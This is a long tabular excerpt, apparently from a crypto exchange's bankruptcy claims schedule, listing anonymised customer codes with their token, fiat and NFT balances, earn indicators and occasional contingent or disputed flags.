| 07337980 | | BRZ[0.00000007], BTC[0], DOGE[0], SHIB[1], SUSHI[0.08598355], USD[0.00] | Yes | |
| 07337981 | | USD[10.00] | | |
| 07337982 | | USD[10.00] | | |
| 07337984 | | USD[10.00] | | |
| 07337985 | | USD[10.00] | | |
| 07337986 | | USD[10.00] | | |
| 07337987 | | BRZ[0], BTC[0], CUSDT[2], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], UNI[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07337988 | | CUSDT[1], ETH[.00000001], ETHW[.00000001], KSHIB[241.61081195], USD[0.00] | Yes | |
| 07337989 | | BAT[1], CUSDT[1], DOGE[2], ETH[0], ETHW[0], TRX[1], USD[0.00] | | |
| 07337990 | | BAT[0], BRZ[1], BTC[0], DOGE[1.92487431], ETH[0], SOL[0], USD[0.00] | | |
| 07337991 | | BRZ[0], BTC[0], DOGE[0], TRX[0], USD[0.00] | | |
| 07337994 | | USD[10.00] | | |
| 07337995 | | DOGE[21.07997631], USD[0.00] | Yes | |
| 07337996 | | DOGE[3.32047851], USD[0.00], USDT[0] | | |
| 07337997 | | USD[10.00] | | |
| 07337998 | | USD[0.00] | | |
| 07338000 | | DOGE[ 98701009], TRX[1], USD[0.48] | | |
| 07338001 | | SHIB[2284180.03706652], USD[0.00] | Yes | |
| 07338002 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07338003 | | USD[10.00] | | |
| 07338004 | | USD[10.00] | | |
| 07338005 | | USD[10.00] | | |
| 07338006 | | USD[10.00] | | |
| 07338007 | | BTC[0], CUSDT[1], DOGE[0], SHIB[276655.88070361], USD[0.00] | | |
| 07338008 | | DOGE[.00000001], KSHIB[36.77475149], SHIB[575485.75063936], USD[0.00] | | |
| 07338009 | | BRZ[0], DOGE[2208.34356264], USD[0.00] | | |
| 07338010 | | USD[10.00] | | |
| 07338011 | | USD[10.00] | | |
| 07338012 | | BRZ[1], CUSDT[1], DOGE[3201.15438450], GRT[234.45262407], SOL[8.87397275], SUSHI[14.54463015], TRX[13334.12215534], USD[0.06] | Yes | |
| 07338013 | | CUSDT[2], SOL[.0000255], USD[0.00], USDT[0] | Yes | |
| 07338014 | | USD[10.00] | | |
| 07338015 | | USD[10.00] | | |
| 07338016 | | BAT[7.62564988], BRZ[5.07952967], BTC[0], CUSDT[9], DOGE[2], ETH[0], ETHW[0], GRT[4.19388138], MATIC[0], SOL[0], TRX[10.03070972], UNI[2.17340025], USD[0.01], USDT[6.52492552] | Yes | |
| 07338017 | | CUSDT[1], DOGE[73.92252814], TRX[1], USD[0.00] | | |
| 07338018 | | DOGE[2], USD[0.01] | | |
| 07338021 | | BRZ[3], CUSDT[5], DOGE[1], USD[0.00] | | |
| 07338022 | | DOGE[135.00318125], TRX[1], USD[10.00] | | |
| 07338024 | | USD[10.00] | | |
| 07338025 | | USD[0.56] | | |
| 07338026 | | USD[10.00] | | |
| 07338027 | | USD[10.00] | | |
| 07338028 | | USD[0.00] | | |
| 07338029 | | BTC[.00000033], ETH[0], USD[0.00] | | |
| 07338030 | | USD[10.00] | | |
| 07338031 | | USD[10.00] | | |
| 07338032 | | BRZ[1], CUSDT[3], GRT[1], TRX[3], USD[0.00], USDT[2] | | |
| 07338033 | | BRZ[1], CUSDT[1], DOGE[1.78846825], USD[0.14] | | |
| 07338035 | | BAT[4], BCH[0], BRZ[9], BTC[0], CUSDT[5], DOGE[0], ETH[0], ETHW[0], GRT[4], LTC[0], SOL[0], TRX[10], USD[0.01], USDT[4] | | |
| 07338036 | | CUSDT[5], DOGE[0], GRT[0], TRX[1], USD[0.01] | Yes | |
| 07338037 | | DOGE[0], TRX[71.60202638], USD[0.00], USDT[0] | Yes | |
| 07338038 | | BRZ[1], SHIB[1], TRX[5.0044501], USD[0.00] | Yes | |
| 07338039 | | USD[10.00] | | |
| 07338040 | | ALGO[1249.42295441], BRZ[3], CUSDT[3], DOGE[2], SHIB[315.48654664], TRX[3], USD[0.00], USDT[0.00000953] | Yes | |
| 07338041 | | BTC[.0012669], DOGE[1646.43458795], USD[0.00] | | |
| 07338042 | | USD[0.00], USDT[1.08895055] | Yes | |
| 07338043 | | USD[10.00] | | |
| 07338044 | | ETH[.14187441], ETHW[.14187441], LTC[1.00012306], SHIB[25935.57668592], SOL[0.23576827], USD[0.00] | | |
| 07338045 | | USD[10.00] | | |
| 07338046 | | USD[10.00] | | |
| 07338047 | | BCH[.00000004], BRZ[.99997618], CUSDT[105.98570733], DAI[.00002341], DOGE[6.09965767], ETH[.00000018], ETHW[.00000018], LINK[1.08255643], LTC[1.08653572], MATIC[10.27240628], MKR[.00000005], SHIB[323246.58032816], SOL[1.08979805], SUSHI[2.48962209], TRX[628.00998967], UNI[.00000009], USD[0.01], USDT[0.00009616] | Yes | |
| 07338048 | | AAVE[0], AVAX[0], BCH[0], BF_POINT[1500], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], MKR[0], NFT [314108919242425964/Fortune Cookies #1994][1], NFT [368328759054928238/Humpty Dumpty #1364][1], NFT [418677249232421048/Little Rocks #1383][1], NFT [571097231689420005/Entrance Voucher #8837][1], SOL[0.00000001], SUSHI[0], TRX[0], UNI[0], USD[0.41], USDT[0.00000001], YFI[0] | Yes | |
| 07338049 | | USD[10.00] | | |
| 07338050 | | USD[10.00] | | |
| 07338051 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07338052 | | USD[10.00] | | |
| 07338053 | | DOGE[.00002557], USD[0.01] | | |
| 07338054 | | BRZ[1], DOGE[1.02907927], USD[0.00], USDT[0] | Yes | |
| 07338055 | | USD[0.00] | | |
| 07338056 | | BRZ[2], CUSDT[1], DOGE[19374.49061375], USD[0.00] | | |
| 07338057 | | BRZ[2], CUSDT[2.47250937], DOGE[1], TRX[1], USD[0.01], USDT[1] | | |
| 07338058 | | USD[10.00] | | |
| 07338059 | | USD[0.01] | | |
| 07338060 | | USD[10.00] | | |
| 07338061 | | CUSDT[1], DOGE[14.00410943], USD[0.00] | Yes | |
| 07338062 | | USD[10.00] | | |
| 07338063 | | USD[10.00] | | |
| 07338064 | | ETH[.00019577], ETHW[.00019577], USD[0.00] | | |
| 07338065 | | DOGE[24.16386583], USD[0.00] | | |
| 07338066 | | USD[10.00] | | |
| 07338067 | | DOGE[134.79635909], USD[0.00] | | |
| 07338068 | | USD[0.23] | | |
| 07338069 | | USD[10.00] | | |
| 07338070 | | CUSDT[3], USD[0.00] | | |
| 07338071 | | USD[10.00] | | |
| 07338072 | | USD[10.00] | | |
| 07338073 | | USD[10.00] | | |
| 07338074 | | USD[10.00] | | |
| 07338075 | | USD[10.00] | | |
| 07338076 | | ETH[0], USD[0.00] | | |
| 07338077 | | BRZ[5.07913124], CUSDT[5], DOGE[8.06762878], GRT[2.05805790], LTC[0], NEAR[24.67657512], SHIB[5], SOL[12.63347643], TRX[13.13070065], USD[0.00], USDT[1.09569403] | Yes | |
| 07338078 | | USD[10.00] | | |
| 07338079 | | CUSDT[4], SHIB[298284.86204325], USD[6.56] | | |
| 07338080 | | CUSDT[5], DOGE[2822.92896417], ETH[.05561447], ETHW[.05561447], TRX[1], USD[0.00] | | |
| 07338081 | | USD[10.00] | | |
| 07338083 | | DOGE[83.45200904], GRT[3.51469406], USD[0.00] | | |
| 07338084 | | BAT[1], BRZ[1], CUSDT[1], TRX[2], USD[0.00], USDT[1] | | |
| 07338085 | | USD[10.00] | | |
| 07338086 | | USD[10.00] | | |
| 07338087 | | BTC[0], DOGE[0], LTC[0], USD[3.91] | | |
| 07338089 | | CUSDT[1], DOGE[.00125814], ETH[.03966107], ETHW[.03966107], USD[0.05] | | |
| 07338090 | | USD[10.36] | Yes | |
| 07338091 | | CUSDT[5], GRT[1], NFT (358942978995986831/Melanie)[1], NFT (471215106026239454/Magic Mushroom  #10)[1], NFT (523859566026371513/Galaxy Bat)[1], TRX[1], USD[0.00] | Yes | |
| 07338092 | | CUSDT[5], SOL[19.41207447], TRX[2], USD[0.00] | | |
| 07338094 | | BTC[0], DOGE[1], USD[0.00] | | |
| 07338095 | | USD[10.00] | | |
| 07338096 | | USD[10.00] | | |
| 07338098 | | USD[0.00], YFI[.0003061] | | |
| 07338099 | | USD[10.00] | | |
| 07338100 | | BTC[.00101438], CUSDT[1], ETH[0], SOL[0], USD[0.00] | | |
| 07338101 | | USD[10.00] | | |
| 07338102 | | GRT[3.24361281], TRX[80.38443696], USD[15.00] | | |
| 07338104 | | USD[10.00] | | |
| 07338105 | | SOL[.32869941], USD[0.00] | | |
| 07338106 | | USD[10.00] | | |
| 07338108 | | DOGE[9034.14296285], USD[60.00] | | |
| 07338110 | | BRZ[1], CUSDT[26], DOGE[0.00311658], ETHW[.0355865], SHIB[61238.62053263], SOL[.69960296], TRX[3], USD[38.75] | Yes | |
| 07338111 | | USD[0.00] | | |
| 07338113 | | USD[10.00] | | |
| 07338114 | | USD[10.00] | | |
| 07338115 | | USD[10.00] | | |
| 07338116 | | BRZ[.00003630], DOGE[15.58147999], ETH[0], USD[0.01] | | |
| 07338117 | | BRZ[0], DOGE[1.00089484], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07338118 | | USD[10.00] | | |
| 07338119 | | USD[10.00] | | |
| 07338120 | | USD[10.00] | | |
| 07338121 | | BRZ[0], DOGE[24.64414481], USD[0.00] | | |
| 07338123 | | BAT[0], DOGE[0.01138226], ETH[0], ETHW[0], GRT[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07338124 | | BTC[0.00003478], ETH[0.00000001], MATIC[1.118], SOL[.00427], USD[54.55], USDT[0] | | |
| 07338125 | | USD[0.06] | | |
| 07338126 | | USD[10.00] | | |
| 07338127 | | USD[10.00] | | |
| 07338128 | | USD[10.00] | | |
| 07338129 | | AAVE[1.30350527], BAT[8.77057973], BRZ[13.16212599], BTC[.04742085], CUSDT[104.02704593], DOGE[38.00098545], ETH[2.0181007], ETHW[2.01725308], GRT[740.46204116], LINK[111.26421943], SOL[1.04440975], SUSHI[158.02600127], TRX[49.17839027], UNI[219.22072577], USD[0.00], USDT[5.4504263], YFI[.03952322] | Yes | |
| 07338130 | | DOGE[24.79831161], USD[0.00] | | |
| 07338131 | | USD[10.00] | | |
| 07338132 | | USD[10.00] | | |
| 07338133 | | BTC[.00021074], DOGE[1], SOL[60.31524736], TRX[1], USD[0.00] | Yes | |
| 07338134 | | CUSDT[3], DOGE[.14689234], TRX[4], USD[10.00], USDT[1] | | |
| 07338135 | | USD[10.00] | | |
| 07338136 | | USD[10.00] | | |
| 07338137 | | CUSDT[2], DOGE[.00004443], USD[2.35] | | |
| 07338138 | | USD[10.00] | | |
| 07338139 | | DOGE[598.87023182], SHIB[3009.280865], USD[0.00] | Yes | |
| 07338140 | | USD[10.00] | | |
| 07338141 | | BRZ[1], CUSDT[4], DOGE[1440.21764647], SHIB[1], USD[7.14] | | |
| 07338142 | | BAT[8.3205977], BRZ[2], CUSDT[7.41700163], DAI[.83067262], DOGE[11436.17235045], EUR[0.28], GRT[1.87375323], MATIC[546.26977915], SHIB[3282994.09061063], SOL[.07427349], SUSHI[.01340282], TRX[3.96946721], USD[0.16] | | |
| 07338143 | | USD[10.00] | | |
| 07338144 | | USD[10.00] | | |
| 07338145 | | BCH[0], BTC[0.00000510], DOGE[0], ETH[0], GRT[0], UNI[0], USD[10.00], YFI[0] | | |
| 07338146 | | BRZ[1], CUSDT[1], DOGE[329.92015251], GRT[42.17596204], SOL[5.901907], SUSHI[1.70364561], TRX[1039.9736718], UNI[2.48052588], USD[0.00] | Yes | |
| 07338147 | | BTC[0], USD[0.00] | | |
| 07338148 | | BTC[0], USD[0.00] | | |
| 07338150 | | USD[0.00], YFI[.0002162] | Yes | |
| 07338151 | | USD[10.00] | | |
| 07338152 | | CUSDT[2], DOGE[.00004983], USD[0.71] | | |
| 07338153 | | USD[0.00] | | |
| 07338154 | | DOGE[.07328428], USD[0.00] | | |
| 07338155 | | AAVE[.33762661], AVAX[5.80981478], BAT[1.0165555], BRZ[2], CUSDT[13], DOGE[.07274557], ETH[.00000011], ETHW[.00000011], LTC[2.16486126], NEAR[8.30590581], SHIB[4503760.93432704], SUSHI[.70235943], TRX[6], UNI[2.84323608], USD[0.00], YFI[.0002766] | Yes | |
| 07338157 | | CUSDT[2375.85917085], DOGE[1170.30768565], TRX[10734.59226677], USD[0.52] | | |
| 07338158 | | BRZ[0], BTC[0], DOGE[1], GRT[0], TRX[0], USD[0.04] | | |
| 07338159 | | NFT (39277761999799991006/Bahrain Ticket Stub #632)[1], USD[6417.23], USDT[0] | Yes | |
| 07338160 | | USD[10.00] | | |
| 07338161 | | CUSDT[1], DOGE[914.78669145], USD[189.39] | | |
| 07338162 | | DOGE[17.51700337], USD[0.00] | | |
| 07338163 | | BTC[0], TRX[1], USD[0.00] | | |
| 07338165 | | USD[10.00] | | |
| 07338166 | | BTC[0.00002284], CUSDT[0], DOGE[0], ETH[0], ETHW[0], SHIB[4], SOL[0.00000575], SUSHI[0], USD[0.00] | Yes | |
| 07338167 | | BRZ[1], CUSDT[22], DOGE[241.32206483], ETH[.00005792], ETHW[.00005792], SHIB[70047.30885666], SOL[.41152067], TRX[8.77775643], USD[0.63] | | |
| 07338168 | | USD[10.00] | | |
| 07338169 | | USD[10.00] | | |
| 07338170 | | DOGE[.139393], USD[0.00] | | |
| 07338171 | | USD[10.00] | | |
| 07338172 | | USD[10.00] | | |
| 07338173 | | USD[14.00] | | |
| 07338174 | | BTC[.02060597], DOGE[21042.66574543], SHIB[21434238.7370126], SOL[21.23341091], SUSHI[74.93754634], TRX[1], USD[0.00] | Yes | |
| 07338176 | | CUSDT[3], USD[0.00] | | |
| 07338177 | | USD[0.01], USDT[0] | | |
| 07338179 | | DAI[9.91138557], USD[0.00] | | |
| 07338180 | | ETH[.00829479], ETHW[.00829479], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07338181 | | SOL[.71511926], USD[0.00] | | |
| 07338182 | | LTC[0], SOL[0.03525918], USD[0.00] | Yes | |
| 07338183 | | AVAX[5.54969413], BAT[101.25112658], BCH[1.04601464], BRZ[153.88195948], CUSDT[4412.94888403], DOGE[128.88683333], GRT[2224.39911358], LINK[68.76651248], MATIC[405.01556882], NFT (3326873209121322273/Entrance Voucher #2467)[1], SHIB[4747865.05454556], SOL[14.83818096], TRX[1970.8213557], USD[0.00] | Yes | |
| 07338184 | | USD[10.00] | | |
| 07338185 | | CUSDT[1], DOGE[1.00714237], TRX[1], USD[0.00] | Yes | |
| 07338187 | | TRX[176.14406893], USD[0.00] | | |
| 07338188 | | BTC[.00012878], CUSDT[1], DOGE[146.75354196], SHIB[27824.42157634], SOL[1.92081493], SUSHI[3.45346634], TRX[265.61937431], USD[0.10] | Yes | |
| 07338189 | | USD[10.00] | | |
| 07338190 | | USD[10.00] | | |
| 07338191 | | BRZ[1], CUSDT[2], USD[0.14] | | |
| 07338192 | | BTC[.00001441], DOGE[0], ETH[.00245077], LINK[.03414744], MATIC[.2335819], SHIB[170.71177959], SOL[.00000001], USD[0.00], USDT[0] | Yes | |
| 07338193 | | USD[10.00] | | |
| 07338194 | | CUSDT[3], DOGE[112.87213650], USD[0.00] | Yes | |
| 07338195 | Contingent, Disputed | USD[10.00] | | |
| 07338196 | | USD[10.00] | | |
| 07338197 | | DOGE[152.16241816], USD[0.00] | | |
| 07338198 | | BRZ[2], BTC[.03246058], CUSDT[5], DOGE[1915.5644818], GRT[1.0031115], MATIC[88.89488098], SOL[49.31640648], SUSHI[291.05687488], TRX[4], UNI[5.10872987], USD[65.54], USDT[2.21029998] | Yes | |
| 07338199 | | USD[10.00] | | |
| 07338201 | | BAT[159.5055532], BTC[0.00098020], CUSDT[2], ETH[0.03933332], ETHW[0.03933332], USD[0.00] | | |
| 07338202 | | BTC[0.00001326], DOGE[.22975], SUSHI[.402625], USD[0.27] | | |
| 07338204 | | BTC[.00017717], DOGE[322.69974304], TRX[1], USD[0.00] | Yes | |
| 07338205 | | USD[10.00] | | |
| 07338206 | | CUSDT[1], DOGE[95.72455036], ETH[.01801942], ETHW[.01801942], LTC[.05716151], TRX[2], USD[1.47] | | |
| 07338208 | | BAT[1.01655549], BRZ[1], CUSDT[8], DOGE[.46701161], GRT[1.00367791], SHIB[1451274.52266535], TRX[2.00003184], USD[0.01] | Yes | |
| 07338209 | | CUSDT[1], DOGE[334.85613707], SHIB[195541.65037152], USD[0.00] | | |
| 07338210 | | ETH[0], ETHW[0], USD[12.02] | | |
| 07338211 | | DOGE[0], SUSHI[0], USD[0.00] | Yes | |
| 07338212 | | BTC[0], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07338213 | | ETH[.00565896], ETHW[.00565896], USD[0.00] | | |
| 07338215 | | BTC[0], DOGE[676.50806341], ETH[0], LINK[0], LTC[0], SHIB[18.61263157], SOL[0], TRX[3], USD[0.00] | Yes | |
| 07338216 | | USD[10.00] | | |
| 07338217 | | DOGE[1], LINK[.0002027], TRX[2], USD[0.00] | | |
| 07338218 | | CUSDT[1], TRX[1], USD[0.35] | | |
| 07338219 | | BRZ[1], BTC[.00126571], CUSDT[1], DOGE[5915.56653575], ETH[.08522668], ETHW[.08522668], TRX[1], USD[0.00] | | |
| 07338220 | | USD[10.00] | | |
| 07338221 | | CUSDT[3], DOGE[372.63588146], USD[0.00] | Yes | |
| 07338223 | | CUSDT[1], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07338224 | | DOGE[140.64986425], USD[0.00] | | |
| 07338225 | | BF_POINT[300], DOGE[1], USD[0.00] | Yes | |
| 07338226 | | USD[10.00] | | |
| 07338227 | | USD[10.00] | | |
| 07338228 | | BRZ[1], TRX[81.90646066], USD[0.00] | Yes | |
| 07338231 | | BRZ[3], CUSDT[1], DOGE[1], USD[0.01] | | |
| 07338233 | | USD[10.00] | | |
| 07338234 | | BRZ[1], BTC[.05127905], CUSDT[5], DOGE[382.79288334], ETH[.77090151], ETHW[.77057063], SHIB[1], TRX[5], USD[0.00] | Yes | |
| 07338235 | | BRZ[1], CUSDT[1], DOGE[2169.40729033], USD[2.00] | | |
| 07338236 | | USD[10.00] | | |
| 07338237 | | USD[10.00] | | |
| 07338238 | | USD[10.00] | | |
| 07338239 | | USD[10.00] | | |
| 07338240 | | USD[0.01] | | |
| 07338241 | | USD[10.00] | | |
| 07338242 | | BAT[9.26402509], BCH[.02688701], BRZ[19.24030428], BTC[.00158454], CUSDT[110.16144149], DOGE[1172.87284565], ETH[.00431956], ETHW[.00426484], EUR[3.54], LTC[.12313939], SHIB[200498.7167645], SUSHI[2.85760350], TRX[176.59957758], USD[191.27] | Yes | |
| 07338243 | | USD[10.00] | | |
| 07338244 | | USD[0.17], USDT[0.00000001] | | |
| 07338245 | | USD[10.00] | | |
| 07338247 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07338248 | | USD[10.00] | | |
| 07338249 | | USD[10.00] | | |
| 07338250 | | CUSDT[1], USD[0.01] | | |
| 07338252 | | USD[10.00] | | |
| 07338254 | | CUSDT[5], SOL[1.42471728], TRX[1], USD[0.00] | | |
| 07338255 | | USD[10.00] | | |
| 07338256 | | DOGE[1], USD[0.01] | Yes | |
| 07338258 | | USD[10.00] | | |
| 07338259 | | USD[0.00] | Yes | |
| 07338260 | | USD[10.78] | Yes | |
| 07338261 | | USD[10.00] | | |
| 07338262 | | DOGE[16.07505725], USD[0.00], USDT[4.97303075] | | |
| 07338263 | | USD[10.00] | | |
| 07338264 | | USD[10.00] | | |
| 07338265 | | TRX[226.65799746], USD[0.00] | Yes | |
| 07338266 | | USD[10.00] | | |
| 07338267 | | BRZ[1], BTC[.00672696], CAD[136.26], CUSDT[5], DOGE[8653.61278677], ETH[.22631187], ETHW[.22631187], TRX[2034.33298299], USD[100.00] | | |
| 07338268 | | CUSDT[6], DOGE[0], ETH[0], SOL[0.00614337], TRX[1], USD[0.81] | | |
| 07338269 | | USD[10.00] | | |
| 07338270 | | USD[0.00] | | |
| 07338271 | | USD[10.00] | | |
| 07338272 | | USD[10.00] | | |
| 07338273 | | USD[10.00] | | |
| 07338274 | | USD[10.00] | | |
| 07338275 | | BRZ[2], CUSDT[9], DOGE[5], SOL[0.00002199], TRX[1], USD[0.00], USDT[6.44030627] | Yes | |
| 07338276 | | BTC[.00000036], DOGE[121.96939469], USD[0.00] | Yes | |
| 07338277 | | USD[10.00] | | |
| 07338278 | | USD[10.00] | | |
| 07338279 | | BRZ[3], CUSDT[13], DOGE[655.87731482], SOL[0], USD[0.01], USDT[0] | Yes | |
| 07338281 | | BAT[1], BRZ[5], BTC[.01518899], CUSDT[10], DOGE[2404.45744613], ETH[.27876191], ETHW[.27876191], GRT[1], LINK[1503.37343227], SHIB[29043122.92506554], SOL[29.90440442], TRX[10], USD[0.00], USDT[1] | | |
| 07338282 | | USD[10.00] | | |
| 07338283 | | USD[10.00] | | |
| 07338284 | | NFT (565488570557433092/Entrance Voucher #3487)[1], USD[10.00] | | |
| 07338285 | | DOGE[199.25236805], USD[0.00] | Yes | |
| 07338286 | | DOGE[146.33423863], USD[10.00], USDT[5.00158941] | | |
| 07338287 | | CUSDT[3], TRX[2], USD[0.00] | | |
| 07338288 | | CUSDT[5], ETH[.00042548], ETHW[.00042548], TRX[4], USD[0.00] | Yes | |
| 07338289 | | USD[10.00] | | |
| 07338290 | | CUSDT[1], DOGE[27.12540721], USD[0.00] | | |
| 07338291 | | USD[10.00] | | |
| 07338292 | | BTC[0], DOGE[.00056019], TRX[1], USD[0.00] | | |
| 07338294 | | BTC[0], CUSDT[1], DOGE[1.00007052], USD[0.00] | | |
| 07338295 | | BF_POINT[300], BRZ[0], BTC[0], DAI[0], ETH[.00000001], ETHW[0], LINK[0], SOL[0], USD[0.01], USDT[0.00000036] | Yes | |
| 07338296 | | USD[10.00] | | |
| 07338297 | | BTC[0], CUSDT[1], DOGE[0], MATIC[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07338298 | | USD[10.00] | | |
| 07338299 | | CUSDT[1], DOGE[763.39405086], ETH[.05088166], ETHW[.05088166], USD[0.01] | | |
| 07338300 | | USD[0.00] | Yes | |
| 07338301 | | CUSDT[1], DOGE[.56402652], TRX[1], USD[0.95] | | |
| 07338302 | | USD[10.00] | | |
| 07338303 | | DOGE[3827.85039349], USD[0.00] | | |
| 07338305 | | USD[10.00] | | |
| 07338306 | | USD[10.00] | | |
| 07338307 | | BRZ[1], DOGE[2], LINK[11.09738504], USD[0.00] | Yes | |
| 07338308 | | USD[0.01] | | |
| 07338309 | | USD[10.00] | | |
| 07338310 | | ETH[.00560389], ETHW[.00560389], USD[0.00] | | |
| 07338311 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07338312 | | CUSDT[1], GRT[1], TRX[2], USD[0.00] | | |
| 07338313 | | USD[10.00] | | |
| 07338314 | | USD[10.00] | | |
| 07338315 | | USD[0.00] | | |
| 07338316 | | USD[0.00] | Yes | |
| 07338317 | | CUSDT[3], DOGE[2288.45825826], TRX[1], USD[0.00] | | |
| 07338318 | | CUSDT[3], USD[0.37] | | |
| 07338319 | | USD[0.00] | | |
| 07338320 | | BTC[.00100561], DOGE[597.81090427], ETH[.00997366], ETHW[.00997366], USD[0.00], USDT[4.95206872] | | |
| 07338321 | | USD[10.00] | | |
| 07338322 | | BTC[0.00001340], USD[0.73] | | |
| 07338323 | | USD[10.00] | | |
| 07338324 | | BRZ[1], CUSDT[4], TRX[1], USD[0.00] | Yes | |
| 07338325 | | BAT[0], BCH[0], BRZ[0.00000013], BTC[0], CUSDT[1], DOGE[1], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[1], USD[0.00], YFI[0] | | |
| 07338326 | | USD[10.37] | Yes | |
| 07338327 | | CUSDT[10], DOGE[734.77161935], TRX[5], USD[56.88] | | |
| 07338328 | | USD[0.00] | | |
| 07338329 | | KSHIB[263.50527475], TRX[1], USD[0.00] | | |
| 07338330 | | USD[0.09] | | |
| 07338331 | | CUSDT[1], DOGE[1], ETH[.0594198], ETHW[.0594198], SUSHI[4.29415058], USD[0.00] | | |
| 07338332 | | USD[10.93] | Yes | |
| 07338333 | | BRZ[2], CUSDT[4], DOGE[4], UNI[0], USD[0.00], USDT[1] | | |
| 07338334 | | BAT[0], SHIB[1.74348993], USD[0.01], USDT[0] | Yes | |
| 07338335 | | BRZ[25.20669743], PAXG[.00259716], USD[0.00] | | |
| 07338336 | | CUSDT[1], DOGE[198.57576148], USD[0.00] | | |
| 07338337 | | BTC[.0025034], USD[0.00] | Yes | |
| 07338338 | | BCH[.00003134], BRZ[1], CUSDT[3], DOGE[1], GRT[.95260923], TRX[8], USD[272.95], USDT[1] | | |
| 07338339 | | USD[10.00] | | |
| 07338340 | | USD[10.00] | | |
| 07338341 | | USD[0.00] | Yes | |
| 07338342 | | BTC[.00021483], USD[0.00] | | |
| 07338343 | | USD[10.00] | | |
| 07338345 | | USD[10.00] | | |
| 07338346 | | DOGE[.22382181], USD[0.00] | | |
| 07338347 | | USD[0.00] | | |
| 07338348 | | USD[0.00] | | |
| 07338349 | | BAT[2.0815546], CUSDT[5], DOGE[3], TRX[2], USD[0.00] | Yes | |
| 07338350 | | CUSDT[6], TRX[.67019946], USD[0.12] | Yes | |
| 07338351 | | BRZ[3], CUSDT[1], GRT[2], TRX[2], USD[0.00], USDT[1] | | |
| 07338352 | | DOGE[1038.23358204], USD[18.32] | | |
| 07338353 | | CUSDT[2], DOGE[14073.6815002], TRX[2], USD[0.00] | | |
| 07338354 | | USD[10.00] | | |
| 07338355 | | ETH[.00652616], ETHW[.00652616], USD[0.00] | | |
| 07338356 | | CUSDT[2], DOGE[393.42149727], TRX[1], USD[0.01] | | |
| 07338357 | | SOL[0], SUSHI[0], USD[0.01], USDT[0.00000001] | | |
| 07338358 | | USD[10.00] | | |
| 07338359 | | CUSDT[1], DOGE[323.25691872], USD[0.00] | Yes | |
| 07338360 | | USD[10.00] | | |
| 07338361 | | CUSDT[12], DOGE[465.27788989], ETH[.06835497], ETHW[.06750619], KSHIB[1772.03692915], SOL[12.1267082], TRX[761.846018], USD[0.22] | Yes | |
| 07338363 | | BRZ[0.00000006], GRT[0], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000005] | Yes | |
| 07338364 | | USD[10.00] | | |
| 07338365 | | USD[10.00] | | |
| 07338366 | | USD[10.00] | | |
| 07338367 | | BRZ[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07338368 | | USD[10.00] | | |
| 07338369 | | USD[10.00] | | |
| 07338370 | | USD[10.00] | | |
| 07338371 | | DOGE[134.96107182], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07338372 | | USD[10.00] | | |
| 07338373 | | TRX[176.83788051], USD[0.00] | | |
| 07338374 | | USD[10.00] | | |
| 07338375 | | CUSDT[1], DOGE[175.08700394], TRX[1], USD[0.00] | Yes | |
| 07338376 | | USD[0.00] | | |
| 07338377 | | USD[10.00] | | |
| 07338378 | | BRZ[4], BTC[.12548743], CUSDT[12], DOGE[18.09979744], NFT (355021738556955621/---^^--- Wonder of Prismatic Colours #2)[1], SHIB[8], SOL[.63889606], TRX[7594.82765904], UNI[14.63041871], USD[0.89], USDT[1.64769081] | Yes | |
| 07338379 | | DOGE[3], USD[0.00] | | |
| 07338380 | | DOGE[1], USD[0.02] | | |
| 07338381 | | USD[10.00] | | |
| 07338382 | | USD[10.00] | | |
| 07338383 | | USD[10.00] | | |
| 07338384 | | BAT[1.01655549], BRZ[3], CUSDT[2], DOGE[.57634502], GRT[1.00473253], TRX[2], USD[0.66] | Yes | |
| 07338385 | | USD[0.02] | Yes | |
| 07338386 | | CUSDT[1], DOGE[555.45842857], SHIB[41932.9669002], SUSHI[2.00356116], TRX[36.72503242], USD[0.00] | | |
| 07338387 | | BAT[1], CUSDT[1], DOGE[0], TRX[1], USD[0.00] | | |
| 07338388 | | USD[10.00] | | |
| 07338389 | | USD[10.00] | | |
| 07338390 | | BRZ[1], BTC[0], CUSDT[1], DOGE[3], ETH[.00003556], ETHW[.00003556], TRX[1], USD[0.00] | Yes | |
| 07338391 | | USD[10.00] | | |
| 07338392 | | USD[10.00] | | |
| 07338393 | | TRX[163.53026639], USD[0.00] | Yes | |
| 07338394 | | DOGE[.01838848], USD[0.00] | Yes | |
| 07338395 | | USD[10.00] | | |
| 07338396 | | BAT[0], BCH[0], BRZ[2], CUSDT[4], DOGE[1], ETH[0], GRT[0], SOL[0], SUSHI[0], TRX[5], USD[0.00] | Yes | |
| 07338397 | | USD[1.99], USDT[0] | | |
